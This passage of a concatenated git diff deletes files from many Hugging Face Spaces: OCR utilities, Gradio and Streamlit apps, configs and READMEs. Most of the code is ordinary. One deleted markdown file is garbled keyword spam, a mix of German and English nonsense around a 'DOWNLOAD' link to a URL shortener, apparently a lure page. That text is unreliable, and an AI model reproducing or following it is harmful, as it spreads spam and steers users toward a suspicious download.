    ", unsafe_allow_html=True - ) - - st.markdown( - f""" - These results have been obtained using model `{version}` from [an ongoing training run](https://wandb.ai/dalle-mini/dalle-mini/runs/mheh9e55). - """ - ) - - st.button("Again!", key="again_button") - - except ServiceError as error: - container.text(f"Service unavailable, status: {error.status_code}") - except KeyError: - if DEBUG: - container.markdown( - """ - **Error: BACKEND_SERVER unset** - - Please, create a file called `.streamlit/secrets.toml` inside the app's folder and include a line to configure the server URL: - ``` - BACKEND_SERVER="" - ``` - """ - ) - else: - container.markdown( - "Error -5, please try again or [report it](mailto:pcuenca-dalle@guenever.net)." - ) diff --git a/spaces/tomofi/MMOCR/mmocr/utils/box_util.py b/spaces/tomofi/MMOCR/mmocr/utils/box_util.py deleted file mode 100644 index de7be7aa645c042eede51a96f123b6775f58e4f5..0000000000000000000000000000000000000000 --- a/spaces/tomofi/MMOCR/mmocr/utils/box_util.py +++ /dev/null @@ -1,199 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import functools - -import numpy as np - -from mmocr.utils.check_argument import is_2dlist, is_type_list - - -def is_on_same_line(box_a, box_b, min_y_overlap_ratio=0.8): - """Check if two boxes are on the same line by their y-axis coordinates. - - Two boxes are on the same line if they overlap vertically, and the length - of the overlapping line segment is greater than min_y_overlap_ratio * the - height of either of the boxes. 
- - Args: - box_a (list), box_b (list): Two bounding boxes to be checked - min_y_overlap_ratio (float): The minimum vertical overlapping ratio - allowed for boxes in the same line - - Returns: - The bool flag indicating if they are on the same line - """ - a_y_min = np.min(box_a[1::2]) - b_y_min = np.min(box_b[1::2]) - a_y_max = np.max(box_a[1::2]) - b_y_max = np.max(box_b[1::2]) - - # Make sure that box a is always the box above another - if a_y_min > b_y_min: - a_y_min, b_y_min = b_y_min, a_y_min - a_y_max, b_y_max = b_y_max, a_y_max - - if b_y_min <= a_y_max: - if min_y_overlap_ratio is not None: - sorted_y = sorted([b_y_min, b_y_max, a_y_max]) - overlap = sorted_y[1] - sorted_y[0] - min_a_overlap = (a_y_max - a_y_min) * min_y_overlap_ratio - min_b_overlap = (b_y_max - b_y_min) * min_y_overlap_ratio - return overlap >= min_a_overlap or \ - overlap >= min_b_overlap - else: - return True - return False - - -def stitch_boxes_into_lines(boxes, max_x_dist=10, min_y_overlap_ratio=0.8): - """Stitch fragmented boxes of words into lines. 
- - Note: part of its logic is inspired by @Johndirr - (https://github.com/faustomorales/keras-ocr/issues/22) - - Args: - boxes (list): List of ocr results to be stitched - max_x_dist (int): The maximum horizontal distance between the closest - edges of neighboring boxes in the same line - min_y_overlap_ratio (float): The minimum vertical overlapping ratio - allowed for any pairs of neighboring boxes in the same line - - Returns: - merged_boxes(list[dict]): List of merged boxes and texts - """ - - if len(boxes) <= 1: - return boxes - - merged_boxes = [] - - # sort groups based on the x_min coordinate of boxes - x_sorted_boxes = sorted(boxes, key=lambda x: np.min(x['box'][::2])) - # store indexes of boxes which are already parts of other lines - skip_idxs = set() - - i = 0 - # locate lines of boxes starting from the leftmost one - for i in range(len(x_sorted_boxes)): - if i in skip_idxs: - continue - # the rightmost box in the current line - rightmost_box_idx = i - line = [rightmost_box_idx] - for j in range(i + 1, len(x_sorted_boxes)): - if j in skip_idxs: - continue - if is_on_same_line(x_sorted_boxes[rightmost_box_idx]['box'], - x_sorted_boxes[j]['box'], min_y_overlap_ratio): - line.append(j) - skip_idxs.add(j) - rightmost_box_idx = j - - # split line into lines if the distance between two neighboring - # sub-lines' is greater than max_x_dist - lines = [] - line_idx = 0 - lines.append([line[0]]) - for k in range(1, len(line)): - curr_box = x_sorted_boxes[line[k]] - prev_box = x_sorted_boxes[line[k - 1]] - dist = np.min(curr_box['box'][::2]) - np.max(prev_box['box'][::2]) - if dist > max_x_dist: - line_idx += 1 - lines.append([]) - lines[line_idx].append(line[k]) - - # Get merged boxes - for box_group in lines: - merged_box = {} - merged_box['text'] = ' '.join( - [x_sorted_boxes[idx]['text'] for idx in box_group]) - x_min, y_min = float('inf'), float('inf') - x_max, y_max = float('-inf'), float('-inf') - for idx in box_group: - x_max = 
max(np.max(x_sorted_boxes[idx]['box'][::2]), x_max) - x_min = min(np.min(x_sorted_boxes[idx]['box'][::2]), x_min) - y_max = max(np.max(x_sorted_boxes[idx]['box'][1::2]), y_max) - y_min = min(np.min(x_sorted_boxes[idx]['box'][1::2]), y_min) - merged_box['box'] = [ - x_min, y_min, x_max, y_min, x_max, y_max, x_min, y_max - ] - merged_boxes.append(merged_box) - - return merged_boxes - - -def bezier_to_polygon(bezier_points, num_sample=20): - """Sample points from the boundary of a polygon enclosed by two Bezier - curves, which are controlled by ``bezier_points``. - - Args: - bezier_points (ndarray): A :math:`(2, 4, 2)` array of 8 Bezier points - or its equivalent. The first 4 points control the curve at one - side and the last four control the other side. - num_sample (int): The number of sample points at each Bezier curve. - - Returns: - list[ndarray]: A list of 2*num_sample points representing the polygon - extracted from Bezier curves. - - Warning: - The points are not guaranteed to be ordered. Please use - :func:`mmocr.utils.sort_points` to sort points if necessary. - """ - assert num_sample > 0 - - bezier_points = np.asarray(bezier_points) - assert np.prod( - bezier_points.shape) == 16, 'Need 8 Bezier control points to continue!' - - bezier = bezier_points.reshape(2, 4, 2).transpose(0, 2, 1).reshape(4, 4) - u = np.linspace(0, 1, num_sample) - - points = np.outer((1 - u) ** 3, bezier[:, 0]) \ - + np.outer(3 * u * ((1 - u) ** 2), bezier[:, 1]) \ - + np.outer(3 * (u ** 2) * (1 - u), bezier[:, 2]) \ - + np.outer(u ** 3, bezier[:, 3]) - - # Convert points to polygon - points = np.concatenate((points[:, :2], points[:, 2:]), axis=0) - return points.tolist() - - -def sort_points(points): - """Sort arbitrary points in clockwise order. Reference: - https://stackoverflow.com/a/6989383. - - Args: - points (list[ndarray] or ndarray or list[list]): A list of unsorted - boundary points. - - Returns: - list[ndarray]: A list of points sorted in clockwise order. 
- """ - - assert is_type_list(points, np.ndarray) or isinstance(points, np.ndarray) \ - or is_2dlist(points) - - points = np.array(points) - center = np.mean(points, axis=0) - - def cmp(a, b): - oa = a - center - ob = b - center - - # Some corner cases - if oa[0] >= 0 and ob[0] < 0: - return 1 - if oa[0] < 0 and ob[0] >= 0: - return -1 - - prod = np.cross(oa, ob) - if prod > 0: - return 1 - if prod < 0: - return -1 - - # a, b are on the same line from the center - return 1 if (oa**2).sum() < (ob**2).sum() else -1 - - return sorted(points, key=functools.cmp_to_key(cmp)) diff --git a/spaces/tomofi/NDLOCR/src/ndl_layout/mmdetection/configs/dcn/mask_rcnn_r50_fpn_mdconv_c3-c5_1x_coco.py b/spaces/tomofi/NDLOCR/src/ndl_layout/mmdetection/configs/dcn/mask_rcnn_r50_fpn_mdconv_c3-c5_1x_coco.py deleted file mode 100644 index 5ca2a67cde62bff078b7c4c0d696a585265e4c3a..0000000000000000000000000000000000000000 --- a/spaces/tomofi/NDLOCR/src/ndl_layout/mmdetection/configs/dcn/mask_rcnn_r50_fpn_mdconv_c3-c5_1x_coco.py +++ /dev/null @@ -1,5 +0,0 @@ -_base_ = '../mask_rcnn/mask_rcnn_r50_fpn_1x_coco.py' -model = dict( - backbone=dict( - dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False), - stage_with_dcn=(False, True, True, True))) diff --git a/spaces/tracinginsights/F1-analysis/README.md b/spaces/tracinginsights/F1-analysis/README.md deleted file mode 100644 index 2833a9ee033c442fd97a6e910f77849988cb0732..0000000000000000000000000000000000000000 --- a/spaces/tracinginsights/F1-analysis/README.md +++ /dev/null @@ -1,14 +0,0 @@ ---- -title: F1 Analysis - Tracing Insights -emoji: 🌖 -colorFrom: lime -colorTo: green -sdk: streamlit -sdk_version: 1.10.0 -app_file: app.py -fullWidth: true -pinned: true -license: other ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/triggah61/chingu-music/CONTRIBUTING.md b/spaces/triggah61/chingu-music/CONTRIBUTING.md deleted file mode 100644 index 
55b99140204d785d572ada9761dd77f302ae31c6..0000000000000000000000000000000000000000 --- a/spaces/triggah61/chingu-music/CONTRIBUTING.md +++ /dev/null @@ -1,35 +0,0 @@ -# Contributing to Audiocraft - -We want to make contributing to this project as easy and transparent as -possible. - -## Pull Requests - -Audiocraft is the implementation of a research paper. -Therefore, we do not plan on accepting many pull requests for new features. -We certainly welcome them for bug fixes. - -1. Fork the repo and create your branch from `main`. -2. If you've added code that should be tested, add tests. -3. If you've changed APIs, update the documentation. -4. Ensure the test suite passes. -5. Make sure your code lints. -6. If you haven't already, complete the Contributor License Agreement ("CLA"). - -## Contributor License Agreement ("CLA") -In order to accept your pull request, we need you to submit a CLA. You only need -to do this once to work on any of Meta's open source projects. - -Complete your CLA here: - -## Issues -We use GitHub issues to track public bugs. Please ensure your description is -clear and has sufficient instructions to be able to reproduce the issue. - -Meta has a [bounty program](https://www.facebook.com/whitehat/) for the safe -disclosure of security bugs. In those cases, please go through the process -outlined on that page and do not file a public issue. - -## License -By contributing to encodec, you agree that your contributions will be licensed -under the LICENSE file in the root directory of this source tree. 
diff --git a/spaces/trysem/nuclearfu/app.py b/spaces/trysem/nuclearfu/app.py deleted file mode 100644 index ea98a02e08d7675b67e632c91e6015c26f8a722d..0000000000000000000000000000000000000000 --- a/spaces/trysem/nuclearfu/app.py +++ /dev/null @@ -1,109 +0,0 @@ -import gradio as gr -import os -import sys -from pathlib import Path -import random -import string -import time -from queue import Queue -from threading import Thread - -text_gen=gr.Interface.load("spaces/trysem/visua") -def get_prompts(prompt_text): - return text_gen(prompt_text) -proc1=gr.Interface.load("models/dreamlike-art/dreamlike-photoreal-2.0") - -def restart_script_periodically(): - while True: - time.sleep(600) # 10 minutes - try: - os.execl(sys.executable, sys.executable, *sys.argv) - except: - pass - -restart_thread = Thread(target=restart_script_periodically, daemon=True) -restart_thread.start() - -queue = Queue() -queue_threshold = 800 - -def add_random_noise(prompt, noise_level=0.07): - if noise_level == 0: - noise_level = 0.07 - # Get the percentage of characters to add as noise - percentage_noise = noise_level * 5 - # Get the number of characters to add as noise - num_noise_chars = int(len(prompt) * (percentage_noise/100)) - # Get the indices of the characters to add noise to - noise_indices = random.sample(range(len(prompt)), num_noise_chars) - # Add noise to the selected characters - prompt_list = list(prompt) - noise_chars = string.ascii_letters + string.punctuation + ' ' - for index in noise_indices: - prompt_list[index] = random.choice(noise_chars) - return "".join(prompt_list) - - -def send_it1(inputs, noise_level, proc1=proc1): - prompt_with_noise = add_random_noise(inputs, noise_level) - output1 = proc1(prompt_with_noise) - return output1 - -def send_it2(inputs, noise_level, proc1=proc1): - prompt_with_noise = add_random_noise(inputs, noise_level) - output2 = proc1(prompt_with_noise) - return output2 - -def send_it3(inputs, noise_level, proc1=proc1): - prompt_with_noise = 
add_random_noise(inputs, noise_level) - output3 = proc1(prompt_with_noise) - return output3 - -#def send_it4(inputs, noise_level, proc1=proc1): - #prompt_with_noise = add_random_noise(inputs, noise_level) - #output4 = proc1(prompt_with_noise) - #return output4 - - - - -with gr.Blocks(css="footer {visibility: hidden}") as myface: - with gr.Row(): - - input_text=gr.Textbox(label="Short Prompt") - see_prompts=gr.Button("Magic Prompt") - with gr.Row(): - - prompt=gr.Textbox(label="Enter Prompt") - noise_level=gr.Slider(minimum=0.0, maximum=3, step=0.1, label="Noise Level: Controls how much randomness is added to the input before it is sent to the model. Higher noise level produces more diverse outputs, while lower noise level produces similar outputs.") - run=gr.Button("Generate") - - with gr.Row(): - like_message = gr.Button("❤️❤️❤️ Press the Like Button if you enjoy my space! ❤️❤️❤️") - - - with gr.Row(): - output1=gr.Image(label="Dreamlike-photoreal-2.0") - output2=gr.Image(label="Dreamlike-photoreal-2.0") - output3=gr.Image(label="Dreamlike-photoreal-2.0") - #output4=gr.Image(label="Dreamlike-photoreal-2.0") - #with gr.Row(): - #output5=gr.Image(label="Dreamlike-photoreal-2.0") - #output6=gr.Image(label="Dreamlike-photoreal-2.0") - #with gr.Row(): - #output7=gr.Image(label="Dreamlike-photoreal-2.0") - #output8=gr.Image(label="Dreamlike-photoreal-2.0") - - see_prompts.click(get_prompts, inputs=[input_text], outputs=[prompt], queue=False) - run.click(send_it1, inputs=[prompt, noise_level], outputs=[output1]) - run.click(send_it2, inputs=[prompt, noise_level], outputs=[output2]) - run.click(send_it3, inputs=[prompt, noise_level], outputs=[output3]) - #run.click(send_it4, inputs=[prompt, noise_level], outputs=[output4]) - #run.click(send_it5, inputs=[prompt, noise_level], outputs=[output5]) - #run.click(send_it6, inputs=[prompt, noise_level], outputs=[output6]) - #run.click(send_it7, inputs=[prompt, noise_level], outputs=[output7]) - #run.click(send_it8, 
inputs=[prompt, noise_level], outputs=[output8]) - - -myface.queue(concurrency_count=100) -myface.launch(enable_queue=True, inline=True) \ No newline at end of file diff --git a/spaces/typesdigital/TwitterPRO/README.md b/spaces/typesdigital/TwitterPRO/README.md deleted file mode 100644 index a0ecf10d0e5e22889f1fd30a2990c3be3d5675ad..0000000000000000000000000000000000000000 --- a/spaces/typesdigital/TwitterPRO/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: TwitterPRO -emoji: 🐢 -colorFrom: gray -colorTo: blue -sdk: gradio -sdk_version: 3.27.0 -app_file: app.py -pinned: false -license: afl-3.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/usbethFlerru/sovits-modelsV2/example/Benimadhabshilpanjikapdfdownload [PORTABLE].md b/spaces/usbethFlerru/sovits-modelsV2/example/Benimadhabshilpanjikapdfdownload [PORTABLE].md deleted file mode 100644 index 815ad4d069e4924e8134d8f93e4145db1bdecf1d..0000000000000000000000000000000000000000 --- a/spaces/usbethFlerru/sovits-modelsV2/example/Benimadhabshilpanjikapdfdownload [PORTABLE].md +++ /dev/null @@ -1,6 +0,0 @@ - -

    benimadhabshilpanjikapdfdownload.F.A.Q. u.a.hdfs2Stunnel: "Wenn Sie die Server lokal angefahren werden (Optionen Optionen aus browser bzw.programm).benimadhabshilpanjikapdfdownload.. o-gyokuro" erweitert bahnbetreiben, kann das gemacht für die von den opls. Whether my download is corrupted or not, you can access the file on my web server through my FTP server.

    -

    benimadhabshilpanjikapdfdownload


    DOWNLOAD ––– https://urlcod.com/2uyVkv



    -

    benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload. 4 000 megabyte der Versionen 10.6 und 10.7 ist die mit dem Windows 7-Release-2 versionsteilung.. benimadhabshilpanjikapdfdownload. Apr 24, 2013. 1) wie lange lesen sie? benimadhabshilpanjikapdfdownload... benimadhabshilpanjikapdfdownload. 2 - benimadhabshilpanjikapdfdownload.Benimadhabshilpanjikapdfdownload - benimadhabshilpanjikapdfdownload. URL: http://www.benimadhabshilpanjikapdfdownload. 3) gewährleistet die integrierte Kopfhaut? benimadhabshilpanjikapdfdownload. For example, an uploaded file can be downloaded to any directory that you tell FileZilla to put files in.. Benimadhabshilpanjikapdfdownload - benimadhabshilpanjikapdfdownload.URL: https://drive.google.com/open?id=19YlX_aEeGAqJtqSjdXRU3ut3BwUkEx7. benimadhabshilpanjikapdfdownload.Product Details.. benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload.. benimadhabshilpanjikapdfdownload. 2,. auf die Daten und Ordner auf dem Arbeitstisch, der auch als Aktivierung.benimadhabshilpanjikapdfdownload. 311274 www.benimadhabshilpanjikapdfdownload.Com benimadhabshilpanjikapdfdownload - benimadhabshilpanjikapdfdownload. URL: http://www.benimadhabshilpanjikapdfdownload.Good/bad/ugly-pdf-benimadhabshilpanjikapdfdownload.

    899543212b
    -
    -
    \ No newline at end of file diff --git a/spaces/utec/SpaceKonnor-tts_transformer-es-css10/app.py b/spaces/utec/SpaceKonnor-tts_transformer-es-css10/app.py deleted file mode 100644 index 2973cdc5fa7bbed8a322d98adc3b76b3fa658875..0000000000000000000000000000000000000000 --- a/spaces/utec/SpaceKonnor-tts_transformer-es-css10/app.py +++ /dev/null @@ -1,5 +0,0 @@ -import gradio as gr - -examples = [["No se que escribir aqui"], ["Esto es un ejemplo, Hola"]] - -gr.Interface.load("huggingface/facebook/tts_transformer-es-css10", title="TTS Tranformer", examples=examples).launch(); \ No newline at end of file diff --git a/spaces/uzairm/anyroad/app.py b/spaces/uzairm/anyroad/app.py deleted file mode 100644 index 30c4b97aa48c34b9ff9428472f601548d46cb2d9..0000000000000000000000000000000000000000 --- a/spaces/uzairm/anyroad/app.py +++ /dev/null @@ -1,64 +0,0 @@ -from dotenv import load_dotenv -import time -from fastapi import FastAPI, HTTPException -import gradio as gr -import os - -from langchain.chains import ConversationalRetrievalChain -from langchain.text_splitter import CharacterTextSplitter -from langchain.embeddings import OpenAIEmbeddings -from langchain.vectorstores import Chroma -from langchain.chat_models import ChatOpenAI -from langchain.document_loaders import PyPDFLoader -from langchain.memory import ConversationBufferMemory - - -app = FastAPI() - -# Load environment variables -load_dotenv(".env") - -documents = [] -for file in os.listdir('docs'): - if file.endswith('.pdf'): - pdf_path = './docs/' + file - loader = PyPDFLoader(pdf_path) - documents.extend(loader.load()) - -text_splitter = CharacterTextSplitter(chunk_size=600, chunk_overlap=0) -texts = text_splitter.split_documents(documents) - -# Select which embeddings to use -embeddings = OpenAIEmbeddings() - -# Create the vector store to use as the index -db = Chroma.from_documents(texts, embeddings) - -# Expose this index in a retriever interface -retriever = db.as_retriever(search_type="mmr", 
search_kwargs={"k": 4}) - -# Create a chain to answer questions -memory = ConversationBufferMemory(memory_key="chat_history", return_messages=True) -qa = ConversationalRetrievalChain.from_llm( - ChatOpenAI(), retriever=retriever, memory=memory -) - - -async def ask_question(question, history): - try: - # Your code to answer questions - result = qa({"question": question, "chat_history": history}) - time.sleep(1) - return result["answer"] - except Exception: - raise HTTPException(status_code=500, detail="Internal Server Error") - - -# Create a Gradio interface for conversation -gr.ChatInterface( - ask_question, - title="AnyRoad Inc.", - description="ChatBot for AnyRoad", - theme="soft", - submit_btn="Send", -).launch() diff --git a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/tracker/track.md b/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/tracker/track.md deleted file mode 100644 index 88db7f264fe2ceba31ec703fb53e8a4dd3dbe46c..0000000000000000000000000000000000000000 --- a/spaces/vaishanthr/Simultaneous-Segmented-Depth-Prediction/yolov8/docs/reference/tracker/track.md +++ /dev/null @@ -1,19 +0,0 @@ ---- -description: Learn how to register custom event-tracking and track predictions with Ultralytics YOLO via on_predict_start and register_tracker methods. -keywords: Ultralytics YOLO, tracker registration, on_predict_start, object detection ---- - -## on_predict_start ---- -### ::: ultralytics.tracker.track.on_predict_start -

    - -## on_predict_postprocess_end ---- -### ::: ultralytics.tracker.track.on_predict_postprocess_end -

    - -## register_tracker ---- -### ::: ultralytics.tracker.track.register_tracker -

    diff --git a/spaces/vbzvibin/Text2SQL/app.py b/spaces/vbzvibin/Text2SQL/app.py deleted file mode 100644 index a75907ce797718590ecc1149765c1bfc53ed287d..0000000000000000000000000000000000000000 --- a/spaces/vbzvibin/Text2SQL/app.py +++ /dev/null @@ -1,178 +0,0 @@ -# -*- coding: utf-8 -*- -""" -Created on Fri May 26 14:07:22 2023 - -@author: vibin -""" - -import streamlit as st -from pandasql import sqldf -import pandas as pd -import re -from typing import List -from transformers import AutoTokenizer, AutoModelForSeq2SeqLM, pipeline -import re - - -@st.cache_resource() -def tapas_model(): - return(pipeline(task="table-question-answering", model="google/tapas-base-finetuned-wtq")) - -@st.cache_resource() -def prepare_input(question: str, table: List[str]): - table_prefix = "table:" - question_prefix = "question:" - join_table = ",".join(table) - inputs = f"{question_prefix} {question} {table_prefix} {join_table}" - input_ids = tokenizer(inputs, max_length=512, return_tensors="pt").input_ids - return input_ids - -@st.cache_resource() -def inference(question: str, table: List[str]) -> str: - input_data = prepare_input(question=question, table=table) - input_data = input_data.to(model.device) - outputs = model.generate(inputs=input_data, num_beams=10, top_k=10, max_length=700) - result = tokenizer.decode(token_ids=outputs[0], skip_special_tokens=True) - return result - -@st.cache_resource() -def tokmod(tok_md): - tkn = AutoTokenizer.from_pretrained(tok_md) - mdl = AutoModelForSeq2SeqLM.from_pretrained(tok_md) - return(tkn,mdl) - - -### Main - -nav = st.sidebar.radio("Navigation",["TAPAS","Text2SQL"]) -if nav == "TAPAS": - - col1 , col2, col3 = st.columns(3) - col2.title("TAPAS") - - col3 , col4 = st.columns([3,12]) - col4.text("Tabular Data Text Extraction using text") - - table = pd.read_csv("data.csv") - table = table.astype(str) - st.text("DataSet - ") - st.dataframe(table,width=3000,height= 400) - - st.title("") - - lst_q = ["Which country has low medicare","Who 
are the patients from india","Who are the patients from india","Patients who have Edema","CUI code for diabetes patients","Patients having oxygen less than 94 but 91"] - - v2 = st.selectbox("Choose your text",lst_q,index = 0) - - st.title("") - - sql_txt = st.text_area("TAPAS Input",v2) - - if st.button("Predict"): - tqa = tapas_model() - txt_sql = tqa(table=table, query=sql_txt)["answer"] - st.text("Output - ") - st.success(f"{txt_sql}") - # st.write(all_students) - - - -elif nav == "Text2SQL": - - ### Function - col1 , col2, col3 = st.columns(3) - col2.title("Text2SQL") - - col3 , col4 = st.columns([1,20]) - col4.text("Text will be converted to SQL Query and can extract the data from DataSet") - - # Import Data - - #df_qna = pd.read_csv("qnacsv.csv", encoding= 'unicode_escape') - df_qna = pd.read_csv("data.csv") - st.title("") - - st.text("DataSet - ") - st.dataframe(df_qna,width=3000,height= 500) - - st.title("") - - lst_q = ["what interface is measure indicator code = 72_HR_ABX and version is 1 and source is TD", "get class code with measure = 72_HR_ABX", "get sum of version for Class_Code is Antibiotic Stewardship", "what interface is measure indicator code = 72_HR_ABX"] - v2 = st.selectbox("Choose your text",lst_q,index = 0) - - st.title("") - - - sql_txt = st.text_area("Text for SQL Conversion",v2) - - - if st.button("Predict"): - - tok_model = "juierror/flan-t5-text2sql-with-schema" - tokenizer,model = tokmod(tok_model) - - # text = "what interface is measure indicator code = 72_HR_ABX and version is 1 and source is TD" - table_name = "df_qna" - table_column = ['Patient_Name', 'Country', 'Disease', 'CUI', 'Snomed', 'Oxygen_Rate','Med_Type', 'Admission_Date'] - - txt_sql = inference(question=sql_txt, table=table_column) - - - ### SQL Modification - sql_avg = ["AVG","COUNT","DISTINCT","MAX","MIN","SUM"] - txt_sql = txt_sql.replace("table",table_name) - sql_quotes = [] - for match in re.finditer("=",txt_sql): - new_txt = txt_sql[match.span()[1]+1:] - try: - 
match2 = re.search("AND",new_txt) - sql_quotes.append((new_txt[:match2.span()[0]]).strip()) - except: - sql_quotes.append(new_txt.strip()) - - for i in sql_quotes: - qts = "'" + i + "'" - txt_sql = txt_sql.replace(i, qts) - - for r in sql_avg: - if r in txt_sql: - rr = re.search(rf"{r} (\w+)", txt_sql) - init = " " + rr[1] - qts = "(" + rr[1] + ")" - txt_sql = txt_sql.replace(init,qts) - else: - pass - - - st.success(f"{txt_sql}") - all_students = sqldf(txt_sql) - - st.text("Output - ") - st.write(all_students) - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/spaces/vinthony/SadTalker/src/face3d/models/arcface_torch/configs/ms1mv3_r2060.py b/spaces/vinthony/SadTalker/src/face3d/models/arcface_torch/configs/ms1mv3_r2060.py deleted file mode 100644 index 23ad81e082c4b6390b67b164d0ceb84bb0635684..0000000000000000000000000000000000000000 --- a/spaces/vinthony/SadTalker/src/face3d/models/arcface_torch/configs/ms1mv3_r2060.py +++ /dev/null @@ -1,26 +0,0 @@ -from easydict import EasyDict as edict - -# make training faster -# our RAM is 256G -# mount -t tmpfs -o size=140G tmpfs /train_tmp - -config = edict() -config.loss = "arcface" -config.network = "r2060" -config.resume = False -config.output = None -config.embedding_size = 512 -config.sample_rate = 1.0 -config.fp16 = True -config.momentum = 0.9 -config.weight_decay = 5e-4 -config.batch_size = 64 -config.lr = 0.1 # batch size is 512 - -config.rec = "/train_tmp/ms1m-retinaface-t1" -config.num_classes = 93431 -config.num_image = 5179510 -config.num_epoch = 25 -config.warmup_epoch = -1 -config.decay_epoch = [10, 16, 22] -config.val_targets = ["lfw", "cfp_fp", "agedb_30"] diff --git a/spaces/visakh7843/Sheet_Music_Generator/markov.py b/spaces/visakh7843/Sheet_Music_Generator/markov.py deleted file mode 100644 index b4c9b4ac9a2ac3f7dfc52b1a3634f2be796d4d30..0000000000000000000000000000000000000000 --- a/spaces/visakh7843/Sheet_Music_Generator/markov.py +++ /dev/null @@ -1,127 
+0,0 @@ -# based on markov.py by Allison Parish -# https://github.com/aparrish/rwet-examples/blob/master/ngrams/markov.py - -import random - -def build_model(tokens, n): - "Builds a Markov model from the list of tokens, using n-grams of length n." - model = dict() - if len(tokens) < n: - return model - for i in range(len(tokens) - n): - gram = tuple(tokens[i:i+n]) - next_token = tokens[i+n] - if gram in model: - model[gram].append(next_token) - else: - model[gram] = [next_token] - final_gram = tuple(tokens[len(tokens)-n:]) - # if final_gram in model: - # model[final_gram].append(None) - # else: - # model[final_gram] = [None] - return model - -def generate(model, n, seed=None, max_iterations=100): - """Generates a list of tokens from information in model, using n as the - length of n-grams in the model. Starts the generation with the n-gram - given as seed. If more than max_iteration iterations are reached, the - process is stopped. (This is to prevent infinite loops)""" - if seed is None: - seed = random.choice(list(model.keys())) - else: - seed = (seed,) - output = list(seed) - current = tuple(seed) - for i in range(max_iterations): - if current in model: - possible_next_tokens = model[current] - next_token = random.choice(possible_next_tokens) - if next_token is None: - print('next token is none') - break - output.append(next_token) - current = tuple(output[-n:]) - else: - break - # print 'output: ' + output[1] - return output - -def merge_models(models): - "Merges two or more Markov models." - merged_model = dict() - for model in models: - for key, val in model.items(): - if key in merged_model: - merged_model[key].extend(val) - else: - merged_model[key] = val - return merged_model - -def generate_from_token_lists(token_lines, n, count=14, max_iterations=100): - """Generates text from a list of lists of tokens. 
This function is intended - for input text where each line forms a distinct unit (e.g., poetry), and - where the desired output is to recreate lines in that form. It does this - by keeping track of the n-gram that comes at the beginning of each line, - and then only generating lines that begin with one of these "beginnings." - It also builds a separate Markov model for each line, and then merges - those models together, to ensure that lines end with n-grams statistically - likely to end lines in the original text.""" - beginnings = list() - models = list() - for token_line in token_lines: - beginning = token_line[:n] - beginnings.append(beginning) - line_model = build_model(token_line, n) - models.append(line_model) - combined_model = merge_models(models) - generated_list = list() - for i in range(count): - generated_str = generate(combined_model, n, random.choice(beginnings), - max_iterations) - generated_list.append(generated_str) - return generated_list - -# def char_level_generate(lines, n, count=14, max_iterations=100): -# """Generates Markov chain text from the given lines, using character-level -# n-grams of length n. Returns a list of count items.""" -# token_lines = [list(line) for line in lines] -# generated = generate_from_token_lists(token_lines, n, count, max_iterations) -# return [''.join(item) for item in generated] - -# def word_level_generate(lines, n, count=14, max_iterations=100): -# """Generates Markov chain text from the given lines, using word-level -# n-grams of length n. Returns a list of count items.""" -# token_lines = [line.split() for line in lines] -# generated = generate_from_token_lists(token_lines, n, count, max_iterations) -# return [' '.join(item) for item in generated] - -def generate_model_from_token_lists(token_lines, n, count=14, max_iterations=100): - """Generates text from a list of lists of tokens. 
This function is intended - for input text where each line forms a distinct unit (e.g., poetry), and - where the desired output is to recreate lines in that form. It does this - by keeping track of the n-gram that comes at the beginning of each line, - and then only generating lines that begin with one of these "beginnings." - It also builds a separate Markov model for each line, and then merges - those models together, to ensure that lines end with n-grams statistically - likely to end lines in the original text.""" - # beginnings = list() - models = list() - for token_line in token_lines: - # beginning = token_line[:n] - # beginnings.append(beginning) - line_model = build_model(token_line, n) - models.append(line_model) - combined_model = merge_models(models) - return combined_model - - -# if __name__ == '__main__': -# import sys -# n = int(sys.argv[1]) -# lines = list() -# for line in sys.stdin: -# line = line.strip() -# lines.append(line) -# for generated in char_level_generate(lines, n): -# print(generated) \ No newline at end of file diff --git a/spaces/vonbarnekowa/stable-diffusion/app.py b/spaces/vonbarnekowa/stable-diffusion/app.py deleted file mode 100644 index a0ee891be2cd5b3104da77cdc491a0ceddc1807b..0000000000000000000000000000000000000000 --- a/spaces/vonbarnekowa/stable-diffusion/app.py +++ /dev/null @@ -1,593 +0,0 @@ -import gradio as gr -import argparse, os -import cv2 -import torch -import numpy as np -from omegaconf import OmegaConf -from PIL import Image -from tqdm import tqdm, trange -from itertools import islice -from einops import rearrange -from torchvision.utils import make_grid -from pytorch_lightning import seed_everything -from torch import autocast -from contextlib import nullcontext -from imwatermark import WatermarkEncoder -import re - -from ldm.util import instantiate_from_config -from ldm.models.diffusion.ddim import DDIMSampler -from ldm.models.diffusion.plms import PLMSSampler -from ldm.models.diffusion.dpm_solver import 
DPMSolverSampler -from huggingface_hub import hf_hub_download -from datasets import load_dataset - -torch.set_grad_enabled(False) - -from share_btn import community_icon_html, loading_icon_html, share_js - -REPO_ID = "stabilityai/stable-diffusion-2" -CKPT_NAME = "768-v-ema.ckpt" -CONFIG_PATH = "./configs/stable-diffusion/v2-inference-v.yaml" -device = "cuda" -stable_diffusion_2_path = hf_hub_download(repo_id=REPO_ID, filename=CKPT_NAME) - -torch.set_grad_enabled(False) - -def chunk(it, size): - it = iter(it) - return iter(lambda: tuple(islice(it, size)), ()) - - -def load_model_from_config(config, ckpt, verbose=False): - print(f"Loading model from {ckpt}") - pl_sd = torch.load(ckpt, map_location="cpu") - if "global_step" in pl_sd: - print(f"Global Step: {pl_sd['global_step']}") - sd = pl_sd["state_dict"] - model = instantiate_from_config(config.model) - m, u = model.load_state_dict(sd, strict=False) - if len(m) > 0 and verbose: - print("missing keys:") - print(m) - if len(u) > 0 and verbose: - print("unexpected keys:") - print(u) - - model.cuda() - model.eval() - return model - -def put_watermark(img, wm_encoder=None): - if wm_encoder is not None: - img = cv2.cvtColor(np.array(img), 